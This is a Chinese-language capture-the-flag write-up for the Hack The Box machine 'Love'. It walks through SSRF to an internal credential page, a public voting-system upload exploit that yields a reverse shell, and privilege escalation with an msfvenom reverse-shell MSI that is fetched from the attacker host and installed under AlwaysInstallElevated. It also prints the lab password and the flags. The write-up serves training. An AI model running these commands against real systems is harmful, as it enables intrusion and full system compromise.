HTB：Love[WriteUP]

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机开放端口进行脚本、服务扫描

使用浏览器访问靶机443端口

尝试利用该功能访问靶机自身80端口

使用ffuf对靶机80端口进行路径FUZZ

漏洞利用

使用searchsploit搜索靶机80端口WebAPP漏洞

将需要利用的各个URL进行修改，靶机并不存在votesystem路径

USER_FLAG：8d5c2780dfa8f56cc7fd8ed6b62ac9f1

特权提升

将攻击机中的winpeas64.exe进行下载

使用msfvenom生成一个msi木马

ROOT_FLAG：16d697353a194abcbbe52226a00e8ad9

---

连接至HTB服务器并启动靶机

靶机IP：10.10.10.239

分配IP：10.10.16.9

---

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.239 -r 1-65535 --ulimit 5000 | tee res.txt

提取出端口号

ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')
                                                                                                                                                        
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670

使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p$ports -sCV 10.10.10.239

使用nmap对靶机UDP常用端口进行开放扫描

nmap -sU --top-ports 20 -Pn 10.10.10.239

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -sU --top-ports 20 -Pn 10.10.10.239         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-28 02:19 EST
Nmap scan report for 10.10.10.239
Host is up (0.071s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    closed        dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds

使用浏览器访问靶机443端口

点击左下角的"查看证书"按钮查看该IP绑定域名

将该域名与靶机IP写入hosts文件中

sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts
                                                                                                                                                   
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts      
10.10.10.239 staging.love.htb

访问该域名后点击左上角的Demo

这里是一个允许直接与URL交互的表单

攻击机本地开启一个http服务

php -S 0:8888

尝试利用该页访问攻击机8888端口

本地成功收到了回显，证明该接口是可以出网的

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# php -S 0:8888
[Thu Nov 28 08:21:53 2024] PHP 8.2.24 Development Server (http://0:8888) started
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Accepted
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 [404]: GET / - No such file or directory
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Closing

尝试利用该功能访问靶机自身80端口

由显示可见，与我们直接访问靶机80端口页面是一致的

利用该功能访问靶机自身5000端口

账户：admin

密码：@LoveIsInTheAir!!!!

使用ffuf对靶机80端口进行路径FUZZ

ffuf -u http://10.10.10.239/FUZZ -w ../dictionary/Common-dir.txt

直接访问/admin路径

填入上面拿到的凭证直接进入后台面板

---

漏洞利用

使用searchsploit搜索靶机80端口WebAPP漏洞

searchsploit voting system

从中将认证后文件上传导致的RCE脚本取出

searchsploit -m 49445.py 

对该脚本中的URL、USERNAME、PASSWORD、LHOST、LPORT进行配置

首先将靶机IP与其根域名进行绑定

sed -i '1i 10.10.10.239 love.htb' /etc/hosts

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 love.htb' /etc/hosts
                                                                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts
10.10.10.239 love.htb

将需要利用的各个URL进行修改，靶机并不存在votesystem路径

本地侧nc开始监听

rlwrap -cAr nc -lvnp 1425

运行该EXP

python 49445.py

本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50501
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

查找user_flag位置并查看其内容

C:\xampp\htdocs\omrs\images>cd c:\
cd c:\

c:\>dir /s user.txt
dir /s user.txt
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\Users\Phoebe\Desktop

11/28/2024  03:37 AM                34 user.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   4,102,651,904 bytes free

c:\>type "c:\Users\Phoebe\Desktop\user.txt"
type "c:\Users\Phoebe\Desktop\user.txt"
8d5c2780dfa8f56cc7fd8ed6b62ac9f1

USER_FLAG：8d5c2780dfa8f56cc7fd8ed6b62ac9f1

---

特权提升

查看靶机系统中存在的用户

net user

C:\xampp\htdocs\omrs\images>net user
net user

User accounts for \\LOVE

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
Phoebe                   WDAGUtilityAccount       
The command completed successfully.

查看靶机系统信息

systeminfo

本地侧开启一个http服务

php -S 0:6666

靶机中的cmd切换到powershell

powershell

将攻击机中的winpeas64.exe进行下载

iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe

PS C:\Users\Phoebe\Desktop> iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
PS C:\Users\Phoebe\Desktop> ls
ls

    Directory: C:\Users\Phoebe\Desktop

Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-ar---        11/28/2024   3:37 AM             34 user.txt                                                             
-a----        11/28/2024   6:16 PM        2424320 winpeas64.exe

直接运行该工具

.\winpeas64.exe

此处可见注册表项AlwaysInstallElevated已启用它允许任何用户以系统身份安装.msi文件

使用msfvenom生成一个msi木马

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f msi > shell.msi

靶机将该木马进行下载

iwr http://10.10.16.9:6666/shell.msi -O shell.msi

本地侧nc开始监听

rlwrap -cAr nc -lvnp 4444

静默安装该木马文件

msiexec /qn /i shell.msi

本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50504
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

查找root_flag位置并查看其内容

C:\WINDOWS\system32>cd c:\
cd c:\

c:\>dir /s root.txt
dir /s root.txt
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of c:\Users\Administrator\Desktop

11/28/2024  03:37 AM                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)   4,095,647,744 bytes free

c:\>type "c:\Users\Administrator\Desktop\root.txt"
type "c:\Users\Administrator\Desktop\root.txt"
16d697353a194abcbbe52226a00e8ad9

ROOT_FLAG：16d697353a194abcbbe52226a00e8ad9